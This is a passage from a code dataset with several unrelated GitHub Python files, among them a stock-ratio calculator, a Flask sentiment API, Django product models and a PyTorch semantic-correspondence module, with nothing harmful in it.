gross_profit = recent_quater['GrossProfit']\r\n except:\r\n gross_profit = None\r\n try: \r\n revenue = recent_quater['TotalRevenue']\r\n except:\r\n revenue = None\r\n try: \r\n operating_income = recent_quater['OperatingIncome']\r\n except:\r\n operating_income = None\r\n try: \r\n net_income = recent_quater['NetIncome']\r\n except:\r\n net_income = None\r\n \r\n try: \r\n gross_profit_margin = (gross_profit / revenue) * 100\r\n except:\r\n gross_profit_margin = None\r\n try: \r\n operating_profit_margin = (operating_income / revenue) * 100\r\n except:\r\n operating_profit_margin = None\r\n try: \r\n net_profit_margin = (net_income / revenue) * 100\r\n except:\r\n net_profit_margin = None\r\n \r\n #Efficiency Ratios\r\n try: \r\n cogs = recent_quater['CostOfRevenue']\r\n except:\r\n cogs = None\r\n try: \r\n inventory_values = quaters.Inventory\r\n average_inventory = sum(inventory_values) / len(inventory_values)\r\n except:\r\n average_inventory = None\r\n try: \r\n accounts_recievable_values = quaters.AccountsReceivable\r\n average_accounts_recievable = sum(accounts_recievable_values) / 
len(accounts_recievable_values)\r\n except:\r\n average_accounts_recievable = None\r\n \r\n try: \r\n inventory_turnover = cogs / average_inventory\r\n except:\r\n inventory_turnover = None\r\n try: \r\n receivables_turnover = revenue / average_accounts_recievable \r\n except:\r\n receivables_turnover = None\r\n else:\r\n current_ratio = None\r\n quick_ratio = None\r\n gross_profit_margin = None\r\n operating_profit_margin = None\r\n net_profit_margin = None\r\n inventory_turnover = None\r\n receivables_turnover = None\r\n \r\n #Perform annualy financial fundamental \r\n annually = stock.all_financial_data(frequency=\"a\")\r\n if('data unavailable' not in annually): \r\n years = annually[annually['TotalAssets'].notna()]\r\n recent_year = annually.iloc[-1] \r\n if(len(years) > 1):\r\n prev_year = annually.iloc[-2]\r\n else:\r\n prev_year = annually.iloc[-1]\r\n #Solvency Ratios\r\n try: \r\n total_debt = recent_year['TotalDebt']\r\n except:\r\n total_debt = None\r\n try: \r\n total_equity = recent_year['StockholdersEquity']\r\n except:\r\n total_equity = None\r\n try: \r\n total_assets = recent_year['TotalAssets']\r\n except:\r\n total_assets = None\r\n try: \r\n ebit = recent_year['EBIT']\r\n except:\r\n ebit = None\r\n try: \r\n interest_expense = recent_year['InterestExpense']\r\n except:\r\n interest_expense = None\r\n \r\n try: \r\n debt_to_equity_ratio = total_debt / total_equity \r\n except:\r\n debt_to_equity_ratio = None\r\n try: \r\n debt_ratio = total_debt / total_assets\r\n except:\r\n debt_ratio = None\r\n try: \r\n interest_coverage_ratio = ebit / interest_expense\r\n except:\r\n interest_coverage_ratio = None\r\n \r\n #Return Ratios\r\n try: \r\n net_income = recent_year['NetIncome']\r\n except:\r\n net_income = None\r\n try: \r\n average_total_assets = (recent_year['TotalAssets'] + prev_year['TotalAssets']) / 2\r\n except:\r\n average_total_assets = None\r\n try: \r\n average_total_equity = (recent_year['StockholdersEquity'] + prev_year['StockholdersEquity']) / 2\r\n except:\r\n average_total_equity = None\r\n try: \r\n total_investments_recent_year = recent_year['AvailableForSaleSecurities'] + recent_year['CashEquivalents'] + recent_year['CashFinancial'] + recent_year['HeldToMaturitySecurities'] + recent_year['InvestmentinFinancialAssets'] + recent_year['OtherShortTermInvestments']\r\n total_investments_prev_year = prev_year['AvailableForSaleSecurities'] + prev_year['CashEquivalents'] + prev_year['CashFinancial'] + prev_year['HeldToMaturitySecurities'] + prev_year['InvestmentinFinancialAssets'] + prev_year['OtherShortTermInvestments']\r\n average_total_investment = (total_investments_recent_year + total_investments_prev_year) / 2\r\n except:\r\n average_total_investment = None\r\n \r\n try: \r\n roa = net_income / average_total_assets\r\n except:\r\n roa = None\r\n try: \r\n roe = net_income / average_total_equity\r\n except:\r\n roe = None\r\n try: \r\n roi = net_income / average_total_investment\r\n except:\r\n roi = None\r\n \r\n #EPS\r\n try: \r\n eps = recent_year['BasicEPS']\r\n except:\r\n eps = None\r\n #Growth Rates\r\n try: \r\n revenue_growth_rate = (recent_year['TotalRevenue'] - prev_year['TotalRevenue']) / prev_year['TotalRevenue']\r\n except:\r\n revenue_growth_rate = None\r\n try: \r\n earnings_growth_rate = (net_income - prev_year['NetIncome']) / prev_year['NetIncome']\r\n except:\r\n earnings_growth_rate = None\r\n try: \r\n pe_ratio = stock.quotes[symbol]['trailingPE']\r\n except:\r\n pe_ratio = None\r\n try: \r\n dividend_yield = 
stock.quotes[symbol]['trailingAnnualDividendYield']\r\n except:\r\n dividend_yield = None \r\n else:\r\n debt_to_equity_ratio = None\r\n debt_ratio = None\r\n interest_coverage_ratio = None\r\n roa = None\r\n roe = None\r\n roi = None\r\n eps = None\r\n revenue_growth_rate = None\r\n earnings_growth_rate = None\r\n pe_ratio = None\r\n dividend_yield = None\r\n \r\n # Add the calculated ratios to the DataFrame\r\n ratios_df = ratios_df.append({\r\n \"Symbol\": symbol,\r\n \"Current Ratio\": current_ratio,\r\n \"Quick Ratio\": quick_ratio,\r\n \"Gross Profit Margin\": gross_profit_margin,\r\n \"Operating Profit Margin\": operating_profit_margin,\r\n \"Net Profit Margin\": net_profit_margin,\r\n \"Inventory Turnover\": inventory_turnover,\r\n \"Receivables Turnover\": receivables_turnover,\r\n \"Debt to Equity Ratio\": debt_to_equity_ratio,\r\n \"Debt Ratio\": debt_ratio,\r\n \"Interest Coverage Ratio\": interest_coverage_ratio,\r\n \"Return on Assets\": roa,\r\n \"Return on Equity\": roe,\r\n \"Return on Investments\": roi,\r\n \"Earnings per Share\": eps,\r\n \"Revenue Growth Rate\": revenue_growth_rate,\r\n \"Earnings Growth Rate\": earnings_growth_rate,\r\n \"P/E Ratio\": pe_ratio,\r\n \"Dividend Yield\": dividend_yield\r\n }, ignore_index=True)\r\n\r\nfile_name = \"stock_ratios_\" + str(datetime.datetime.now().strftime(\"%Y-%m-%dT%H-%M-%S\")) + \".csv\"\r\n# Save the ratios DataFrame to a CSV file\r\nratios_df.to_csv(file_name, index=False)\r\n","repo_name":"enkredAbal/Stonks","sub_path":"Stonks/Fundamental_Ratios_yahoo.py","file_name":"Fundamental_Ratios_yahoo.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"529459152","text":"from src.svuchatbot_mogodb.client import get_collection\nfrom src.svuchatbot_preprocess.extractor import Extractor\nfrom camel_tools.ner import NERecognizer\n\n\nclass EntitiesExtractor(Extractor):\n @staticmethod\n def extract_entities_for_sentence(sent, ner):\n return [(word, label) for word, label in zip(sent, ner.predict_sentence(sent)) if not label.startswith(\"O\")]\n\n def do(self, ids):\n # documents = [d for d in self.col.find()]\n # print(len(documents))\n col = get_collection(self.db_name, self.col_name)\n cursor = col.find({\"_id\": {\"$in\": ids}})\n ner = NERecognizer.pretrained()\n # cursor = col.find({\"_id\": {\"$in\": ids}})\n if type(self.field_name) is list:\n for item in cursor:\n tmp = set([w for field in self.field_name for w in item[field]])\n item[\"entities\"] = EntitiesExtractor.extract_entities_for_sentence(tmp, ner)\n cursor.collection.replace_one({\"_id\": item[\"_id\"]}, item)\n else:\n for item in cursor:\n item[\"entities\"] = EntitiesExtractor.extract_entities_for_sentence(item[self.field_name], ner)\n cursor.collection.replace_one({\"_id\": item[\"_id\"]}, item)\n","repo_name":"AnasJS/svuchatbot","sub_path":"src/svuchatbot_preprocess/entities_extractor.py","file_name":"entities_extractor.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"9218417384","text":"import os\nfrom FeatureSelection import FeatureSelection\nimport pandas as pd\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn import svm\nfrom sklearn.feature_extraction.text import TfidfVectorizer,TfidfTransformer,CountVectorizer\nimport matplotlib.pyplot as plt\nfrom 
sklearn.feature_selection import SelectKBest, chi2, mutual_info_classif\nimport math\n\ndf=pd.DataFrame()\n\n\n\ndef split_data(data,partition_by_id,category): #put this method under the open csv loop data must be in panda form\n data= data\n cat=category\n data['topic_bool']=data['topic'].map(lambda text :target_category(text,cat))\n for index,row in data.iterrows():\n if ( int(row['filename']) < partition_by_id ):\n y_train.append(row['topic_bool'])\n else:\n y_test.append(row['topic_bool'])\n\n\ndef target_category(text,target_cat):\n text=text[:-1]# strip last ;\n array=text.split(';')\n for x in array:\n if (x.startswith(target_cat)):\n return 1\n return 0\n\n\ncategory_matrix=[\"C1\",\"C11\",\"C12\",\"C13\",\"C14\",\"C15\",\"C151\",\"C1511\",\"C152\",\"C16\",\"C17\",\"C171\",\"C172\",\"C173\",\"C174\",\"C18\",\"C181\",\"C182\",\"C183\",\"C2\",\"C21\",\n\"C22\",\"C23\",\"C24\",\"C3\",\"C31\",\"C311\",\"C312\",\"C313\",\"C32\",\"C33\",\"C331\",\"C34\",\"C4\",\"C41\",\"C411\",\"C42\",\"C\",\"E1\",\"E11\",\"E12\",\"E121\",\"E13\",\n\"E131\",\"E132\",\"E14\",\"E141\",\"E142\",\"E143\",\"E2\",\"E21\",\"E211\",\"E212\",\"E3\",\"E31\",\"E311\",\"E312\",\"E313\",\"E4\",\"E41\",\"E411\",\"E5\",\"E51\",\"E511\",\n\"E512\",\"E513\",\"E6\",\"E61\",\"E7\",\"E71\",\"E\",\"G1\",\"G15\",\"G151\",\"G152\",\"G153\",\"G154\",\"G155\",\"G156\",\"G157\",\"G158\",\"G159\",\"G\",\"GCRIM\",\"GDEF\",\"GDIP\",\"GDIS\",\"GENT\",\"GENV\",\"GFAS\",\"GHEA\",\"GJOB\",\"GMIL\",\"GOBIT\",\"GODD\",\"GPOL\",\"GPRO\",\"GREL\",\"GSCI\",\"GSPO\",\"GTOUR\",\n\"GVIO\",\"GVOTE\",\"GWEA\",\"GWELF\",\"M1\",\"M11\",\"M12\",\"M13\",\"M131\",\"M132\",\"M14\",\"M141\",\"M142\",\"M143\",\"M\"]\n# category_matrix=[\"C\"]\ntrain_list=[]\ntest_list=[]\ni=0\nfor category in category_matrix:\n df=pd.DataFrame()\n y_train=[]\n y_test=[]\n partition_by_id=389827\n\n #use relative path\n for csv in os.listdir(\"../testspace2/csvs\"):\n data = pd.read_csv(\"../testspace2/csvs/\"+csv, encoding = 'iso-8859-1')\n split_data(data,partition_by_id,category)\n train_list.append(sum(y_train))\n test_list.append(sum(y_test))\n \ndf['categories']=category_matrix\ndf['train_docs']=train_list\ndf['test_docs']=test_list\ndf['percent_train']=df['train_docs']/len(y_train)\ndf['percent_test']=df['test_docs']/len(y_test)\n\n\ndf.to_csv('../testspace2/csvs2/exlpore.csv', index=False)\n\n\n\n\n","repo_name":"kostas1515/feature_selec_4_txt_class_using_time_seq","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"97"} +{"seq_id":"33208838151","text":"from flask import Flask, render_template, request, jsonify, make_response\nfrom review_classification.predict import make_prediction_raw\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef predict():\n \"\"\"View that handles the default get request and the post request when\n a form is submitted.\"\"\"\n\n # when the form is submitted this route gets a POST request\n if request.method == 'POST':\n review_text = request.form[\"text_input\"]\n\n # if no input provided\n if not review_text.strip():\n return render_template('index.html', error=\"No text provided.\")\n\n # catch any error during prediction\n try:\n predictions = make_prediction_raw([review_text])\n except Exception as e:\n return render_template('index.html', error=e)\n\n prediction = 'positive' if 
predictions[0] == 1 else 'negative'\n # finally render template with correct sentiment\n return render_template('index.html', prediction=prediction)\n\n # this is the 'home' route with a get request (no form submitted)\n else:\n return render_template('index.html')\n\n\n@app.route('/api/sentiment/v1', methods=['POST'])\ndef predict_api():\n \"\"\"\n JSON Response for requests over api\n waiting:\n '{\"input\": \"text\"}'\n returning:\n '{\"prediction\": \"positive\", \"error\" : \"\"}'\n \"\"\"\n\n # when the form is submitted this route gets a POST request\n if request.method == 'POST':\n review_text = request.json[\"input\"]\n\n # if no input provided\n if not review_text.strip():\n return jsonify({'prediction': \"\", 'error': \"No input text.\"}), 400\n\n # catch any error during prediction\n try:\n predictions = make_prediction_raw([review_text])\n except Exception as _:\n return jsonify({'prediction': \"\", 'error': \"Something wrong in server.\"}), 500\n\n prediction = 'positive' if predictions[0] == 1 else 'negative'\n # finally render template with correct sentiment\n return jsonify({'prediction': prediction})\n elif request.method == 'OPTIONS':\n # temporary solution for cross site resource sharing\n # later, a library can be used.\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"dlangCGI/ReviewSentiment","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"37094879364","text":"import requests\n\n\ndef get_dad_joke(joke_id=None):\n\n url = \"https://icanhazdadjoke.com/\"\n if joke_id:\n url += \"j/\" + joke_id\n headers = {\n \"Accept\": \"text/plain\",\n \"User-Agent\": \"https://github.com/out-running-27/dad_joke_cicd\",\n }\n\n r = requests.get(url, headers=headers)\n\n return r.text\n","repo_name":"out-running-27/dad_joke_cicd","sub_path":"jokes/dad_jokes.py","file_name":"dad_jokes.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"18471864139","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\n\n#categoria\nclass Categoria(models.Model):\n descricao = models.CharField(max_length=100)\n\n def __unicode__(self):\n return self.descricao\n\n def subCategorias(self):\n lista = SubCategoria.objects.filter(categoria_pai_id= self.id)\n return lista\n\n#sub-categoria\nclass SubCategoria(models.Model):\n descricao = models.CharField(max_length=100)\n categoria_pai = models.ForeignKey(Categoria)\n\n def __unicode__(self):\n return self.descricao\n\n\n#formato-produto\nclass FormatoProduto(models.Model):\n descricao = models.CharField(u'Formato do Produto', max_length=100)\n\n def __unicode__(self):\n return self.descricao\n\n\n# produto\nclass Produto (models.Model):\n nome = models.CharField(u'Nome', max_length=120,)\n formato = models.ForeignKey(FormatoProduto, null=True, blank=True)\n categoria = models.ForeignKey(Categoria)\n subcategoria = models.ForeignKey(SubCategoria, null=True, blank=True)\n descricao = models.TextField(\n u'Descrição do Produto',\n max_length=2048,\n )\n thumbnail = models.ImageField(\n u'Imagem Principal',\n null=True,\n blank=True,\n upload_to='produtos',\n )\n\n ativo = models.BooleanField(default=True)\n\n def __unicode__(self):\n return self.nome\n\n\nclass 
AlbumProduto(models.Model):\n produto = models.ForeignKey(Produto)\n img = models.ImageField(\n u'imagem 1',\n upload_to='produtos',\n )\n\n\nclass Galeria(models.Model):\n nome = models.CharField(\n u'Nome',\n max_length=120,\n )\n img1 = models.ImageField(\n u'imagem 1',\n upload_to='produtos/galeria',\n )\n img2 = models.ImageField(\n u'imagem 2',\n upload_to='produtos/galeria',\n )\n img3 = models.ImageField(\n u'imagem 3',\n upload_to='produtos/galeria',\n )\n img4 = models.ImageField(\n u'imagem 4',\n upload_to='produtos/galeria',\n )\n\n ativo = models.BooleanField(default=False)\n\n def __unicode__(self):\n return self.nome","repo_name":"andreximenes/dekori_project","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"37831877498","text":"import logging\nfrom settings import log_file_path\n\n# Logger LEVEL:\n# DEBUG: Detailed information, typically of interest only when diagnosing problems.\n# INFO: Confirmation that things are working as expected.\n# WARNING: An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected.\n# ERROR: Due to a more serious problem, the software has not been able to perform some function.\n# CRITICAL: A serious error, indicating that the program itself may be unable to continue running.\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s: %(module)s.py: %(levelname)s: %(message)s')\n\nfile_handler = logging.FileHandler(log_file_path)\nfile_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\n\n\ndef test_level():\n logger.debug('debug')\n logger.info('info')\n logger.warning('warning')\n logger.error('error')\n logger.critical('critical')\n\n\nif __name__ == '__main__':\n logger.info('--- START OF PROGRAM --- ')\n test_level()\n logger.info('--- END OF PROGRAM --- \\n')\n","repo_name":"ritonun/Apheleia-Inventory-System","sub_path":"aphe/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"11535626507","text":"def solution(n,a,b):\n answer = 1\n\n while(1):\n if (abs(a-b) == 1) & (max(a,b)%2 == 0):\n break\n else:\n answer+=1\n a = (a+1)//2\n b = (b+1)//2\n return answer\n\nprint(solution(8,4,7))\n","repo_name":"secretdsy/programmers","sub_path":"level2/practice/12985.py","file_name":"12985.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"31443374969","text":"# Copyright 2019 Orange and its contributors\r\n# This software is distributed under the terms and conditions of the 'Apache-2.0'\r\n# license which can be found in the file 'LICENSE' in this package distribution\r\n# or at 'http://www.apache.org/licenses/LICENSE-2.0'.\r\n\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(levelname)s %(message)s', filename='C:/Users/nzpb1414/PycharmProjects/meta_data_log.log')\r\nlogger = logging.getLogger(__name__)\r\n\r\nlogger.info('heelloo: Starts')\r\nlogger.debug('Meta-Data Test: 
Starts')","repo_name":"opnfv/moon","sub_path":"moon_manager/tests/func_tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"97"} +{"seq_id":"7384079492","text":"import os\nimport math\nimport torch\nimport torch.nn.functional as F\nfrom sklearn.cluster import KMeans\nfrom . import feature_metric as FM\nfrom utils import draw_correspondence as draw\nfrom utils import util\nfrom pprint import pprint\nimport time\n\n\nclass sparse_semantic_correspondence:\n \"\"\"稀疏 语义 一致性\"\"\"\n\n def __init__(self, model, gpu_ids, tau, border_size, save_dir, k_per_level, k_final, fast):\n \"\"\"\n :param model: vgg19, forward 设置 start/end level 得到中间层特征\n :param gpu_ids:\n :param tau: 0.05, 经验值,选择 较优的 NBBs\n :param border_size:\n :param save_dir: 中间层 一致性点 保存 dir\n :param k_per_level: 每层最多搜索的 pts 数量\n :param k_final: 每层最多保留的 pts 数量\n :param fast: True 保存到 level 2 截至, 1/2 feature map\n \"\"\"\n self.Tensor = torch.cuda.FloatTensor if gpu_ids else torch.Tensor\n self.model = model\n self.tau = tau\n self.border_size = border_size # 7\n self.save_dir = save_dir\n self.k_per_level = k_per_level\n self.k_final = k_final\n self.L_final = 2 if fast else 1 # fast 场景到 level2\n\n # define 5 levels\n self.patch_size_list = [[5, 5], [5, 5], [3, 3], [3, 3], [3, 3]] # 2*radius -1\n self.search_box_radius_list = [3, 3, 2, 2, 2]\n self.draw_radius = [2, 2, 2, 4, 8]\n self.pad_mode = 'reflect'\n\n def find_mapping(self, A, B, patch_size, initial_mapping, search_box_radius):\n \"\"\"\n :param A: F_Am_normalized 归一化特征单位向量\n :param B: F_Bm_normalized\n :param patch_size: [3, 3]\n :param initial_mapping: initial_map_a_to_b, identity_map, 坐标位 [i][j]\n :param search_box_radius: 2\n :return:\n \"\"\"\n A_to_B_map = self.Tensor(1, 2, A.size(2), A.size(3))\n\n dx, dy = math.floor(patch_size[0] / 2), math.floor(patch_size[1] / 2)\n pad_size = [dy, dy, dx, dx]\n\n # pad img, 考虑边缘\n A_padded = F.pad(A, pad_size, self.pad_mode)\n B_padded = F.pad(B, pad_size, self.pad_mode)\n\n # O(H*W * H*W)\n for i in range(A.size(2)): # H\n for j in range(A.size(3)): # W\n # patch A\n candidate_patch_A = A_padded[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] # 3*3\n index = self.find_closest_patch_index( # todo: 并行化\n B_padded,\n candidate_patch_A,\n initial_mapping[0, :, i, j], # (i,j)\n search_box_radius\n )\n # A (i,j) 对应于 B (index)\n A_to_B_map[:, :, i, j] = self.Tensor([index[0] - dx, index[1] - dy])\n\n return A_to_B_map\n\n def find_closest_patch_index(self, B, patch_A, inital_pixel, search_box_radius):\n \"\"\"\n :param B: B_padded feature\n :param patch_A: patch features C*3*3\n :param inital_pixel: initial_mapping[0, :, i, j] -> 初始 A 的 i,j; 寻找对应 B 上的区域\n :param search_box_radius: 2\n :return:\n \"\"\"\n dx, dy = math.floor(patch_A.size(2) / 2), math.floor(patch_A.size(3) / 2)\n search_dx = search_dy = search_box_radius # 搜索 radius, 点的半径 所在区域\n\n # 初始 A(i,j) 对应的 B 区域; 最深层二者映射是一样的,到了浅层 i,j 就会变换了\n up_boundary = int(inital_pixel[0] - search_dx) if inital_pixel[0] - search_dx > 0 else 0\n down_boundary = int(inital_pixel[0] + 2 * dx + search_dx + 1) if inital_pixel[0] + 2 * dx + search_dx + 1 < B.size(2) else B.size(2)\n left_boundary = int(inital_pixel[1] - search_dy) if inital_pixel[1] - search_dy > 0 else 0\n right_boundary = int(inital_pixel[1] + 2 * dy + search_dy + 1) if inital_pixel[1] + 2 * dy + search_dy + 1 < B.size(3) else B.size(3)\n\n # pad B 1*512*3*3 -> 1*512*5*5; pad 后 对每个位置 做 conv\n search_box_B = B[:, :, 
up_boundary:down_boundary, left_boundary:right_boundary]\n\n # patch_A 1*512*3*3 作为卷积核 weight\n # 将 search_box_B 从 512 -> 1 维\n result_B = F.conv2d(search_box_B, patch_A.contiguous()).data\n # print(patch_A.shape) # [1, 512, 3, 3]\n # print(search_box_B.shape) # [1, 512, 5, 5]\n # print(result_B.shape) # [1, 1, 3, 3]\n\n # cos distance\n distance = result_B\n # todo: 可能存在多个 max,返回一个即可\n _, _, max_i, max_j = torch.where(distance == distance.max())\n if len(max_i) > 1:\n max_i, max_j = max_i[0], max_j[0]\n # +dx, +dy 转换到 B patch 坐标系\n # +up_boundary, +left_boundary 转换到 B 全图坐标系\n closest_patch_index = [max_i + dx + up_boundary, max_j + dy + left_boundary]\n\n return closest_patch_index\n\n def warp(self, A_size, B, patch_size, mapping_a_to_b): # mapping_a_to_b\n \"\"\"\n 根据 mapping_a_to_b 将 A 对应 B 的区域 映射到 A 自身的位置\n \"\"\"\n assert (B.size() == A_size)\n [dx, dy] = [math.floor(patch_size[0] / 2), math.floor(patch_size[1] / 2)]\n B_padded = F.pad(B, [dy, dy, dx, dx], self.pad_mode)\n\n # 保存从 B 映射到的 A 中每个 patch 对应的 B feature\n warped_A = self.Tensor(B_padded.size()).fill_(0.0)\n\n counter = self.Tensor(B_padded.size()).fill_(0.0)\n patch_cnt = self.Tensor(B_padded.size(0), B_padded.size(1), patch_size[0], patch_size[1]).fill_(1.0)\n\n for i in range(A_size[2]):\n for j in range(A_size[3]):\n # A region 对应的 B region 添加到 A 中 (i,j) 位置\n ab_i, ab_j = map(int, mapping_a_to_b[0, :, i, j])\n # 因为 stride=1, 而 patch_size>1, patch 内部分 pixel 多次加 feature,所以用 counter 平均特征\n warped_A[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] += \\\n B_padded[:, :, ab_i:ab_i + 2 * dx + 1, ab_j:ab_j + 2 * dy + 1]\n counter[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] += patch_cnt\n\n warped_A = warped_A[:, :, dx:(warped_A.size(2) - dx), dy:(warped_A.size(3) - dy)] / \\\n counter[:, :, dx:(warped_A.size(2) - dx), dy:(warped_A.size(3) - dy)]\n return warped_A\n\n def mapping_to_image_size(self, mapping, level, original_image_size):\n if level == 1:\n return mapping\n else:\n identity_map_L = self.identity_map(mapping.size())\n identity_map_original = self.identity_map(original_image_size)\n factor = int(math.pow(2, level - 1))\n return identity_map_original + self.upsample_mapping(mapping - identity_map_L, factor=factor)\n\n def upsample_mapping(self, mapping, factor=2):\n upsampler = torch.nn.Upsample(scale_factor=factor, mode='nearest')\n return upsampler(factor * mapping).data\n\n def normalize_0_to_1(self, F):\n assert (F.dim() == 4)\n max_val = F.max()\n min_val = F.min()\n if max_val != min_val:\n F_normalized = (F - min_val) / (max_val - min_val)\n else:\n F_normalized = self.Tensor(F.size()).fill_(0)\n\n return F_normalized\n\n def identity_map(self, size):\n \"\"\"\n C=2,存储 grid i,j 坐标,element-wise 组合可以得到 坐标位置\n :param size: feature tensor size, 1,512,14,14\n :return:\n \"\"\"\n idnty_map = self.Tensor(size[0], 2, size[2], size[3])\n # size[0] = 1\n idnty_map[0, 0, :, :].copy_(\n torch.arange(0, size[2]).repeat(size[3], 1).transpose(0, 1) # arange(size[2]), i; (W,H)->(H,W)\n )\n idnty_map[0, 1, :, :].copy_(\n torch.arange(0, size[3]).repeat(size[2], 1) # arange(size[3]), j\n )\n return idnty_map\n\n def find_neural_best_buddies(self, correspondence, F_A, F_B, F_Am, F_Bm, patch_size,\n initial_map_a_to_b, initial_map_b_to_a, search_box_radius,\n deepest_level=False):\n \"\"\"\n :param correspondence: 对应点 来自 上层\n :param F_A: model features\n :param F_B:\n :param F_Am: clone features\n :param F_Bm:\n :param patch_size: 对应 level 的 region patch 大小\n :param initial_map_a_to_b: 初始 i,j 坐标位, find_mapping 会更新得到 a_to_b, 
b_to_a\n :param initial_map_b_to_a:\n :param search_box_radius:\n :param deepest_level: 深层,控制\n :return:\n refined_correspondence\n a_to_b\n b_to_a\n \"\"\"\n # 归一化: feature vector -> 单位向量\n # 方便后面计算 feature vector 间 cos similarity\n F_Am_normalized = FM.normalize_per_pix(F_Am)\n F_Bm_normalized = FM.normalize_per_pix(F_Bm)\n\n # NN, d_max\n t1 = time.time()\n a_to_b = self.find_mapping(F_Am_normalized, F_Bm_normalized, patch_size, initial_map_a_to_b, search_box_radius)\n b_to_a = self.find_mapping(F_Bm_normalized, F_Am_normalized, patch_size, initial_map_b_to_a, search_box_radius)\n print('map time:', time.time() - t1)\n\n if deepest_level:\n # mutual NN, correspondence\n # return [[A_pts], [B_pts]] NBBs\n refined_correspondence = self.find_best_buddies(a_to_b, b_to_a)\n # cal rank activations\n # return [[A_pts], [B_pts], [rank_activations]]\n refined_correspondence = self.calculate_activations(refined_correspondence, F_A, F_B)\n else:\n refined_correspondence = correspondence\n for i in range(len(correspondence[0]) - 1, -1, -1):\n top_left_1, bottom_right_1 = self.extract_receptive_field(correspondence[0][i][0], correspondence[0][i][1], search_box_radius,\n [a_to_b.size(2), a_to_b.size(3)])\n top_left_2, bottom_right_2 = self.extract_receptive_field(correspondence[1][i][0], correspondence[1][i][1], search_box_radius,\n [a_to_b.size(2), a_to_b.size(3)])\n # 针对每个 patch, find_best_buddies\n refined_correspondence_i = self.find_best_buddies(a_to_b, b_to_a, top_left_1, bottom_right_1, top_left_2, bottom_right_2)\n refined_correspondence_i = self.calculate_activations(refined_correspondence_i, F_A, F_B)\n refined_correspondence = self.replace_refined_correspondence(refined_correspondence, refined_correspondence_i, i)\n\n return refined_correspondence, a_to_b, b_to_a\n\n def find_best_buddies(self, a_to_b, b_to_a,\n top_left_1=[0, 0],\n bottom_right_1=[float('inf'), float('inf')],\n top_left_2=[0, 0],\n bottom_right_2=[float('inf'), float('inf')]):\n \"\"\"\n :param a_to_b: A/B patch 内 i,j 映射\n :param b_to_a:\n :param top_left_1: # 后面四组坐标位; 中间层特征要使用; 表示1个 patch 范围\n :param bottom_right_1:\n :param top_left_2:\n :param bottom_right_2:\n :return:\n \"\"\"\n assert (a_to_b.size() == b_to_a.size())\n correspondence = [[], []] # A pts, B pts\n # number_of_cycle_consistencies = 0\n\n for i in range(top_left_1[0], min(bottom_right_1[0], a_to_b.size(2))):\n for j in range(top_left_1[1], min(bottom_right_1[1], a_to_b.size(3))):\n # 通过 A(i,j) -> a_to_b(i,j) A 对应于 B 的 i,j -> b_to_a(map)\n ab_i, ab_j = map(int, a_to_b[0, :, i, j]) # A->B\n aba_i, aba_j = b_to_a[0, :, ab_i, ab_j] # A->B->A\n\n d = FM.spatial_distance( # 判断二点 是否循环对应\n point_A=self.Tensor([i, j]),\n point_B=self.Tensor([aba_i, aba_j])\n )\n if d == 0: # 满足循环对应, long 型 tensor 不能直接和 float 比较\n if top_left_2[0] <= ab_i < bottom_right_2[0] and top_left_2[1] <= ab_j < bottom_right_2[1]:\n correspondence[0].append([i, j]) # A 中 i,j 对应\n correspondence[1].append([ab_i, ab_j]) # B 中 ab_i,ab_j\n # number_of_cycle_consistencies += 1\n\n # 每个 patch 内输出一组\n # print('number_of_cycle_consistencies:', number_of_cycle_consistencies)\n return correspondence\n\n def extract_receptive_field(self, x, y, radius, width):\n center = [2 * x, 2 * y]\n top_left = [max(center[0] - radius, 0), max(center[1] - radius, 0)]\n bottom_right = [min(center[0] + radius + 1, width[0]), min(center[1] + radius + 1, width[1])]\n return [top_left, bottom_right]\n\n def replace_refined_correspondence(self, correspondence, refined_correspondence_i, index):\n new_correspondence = 
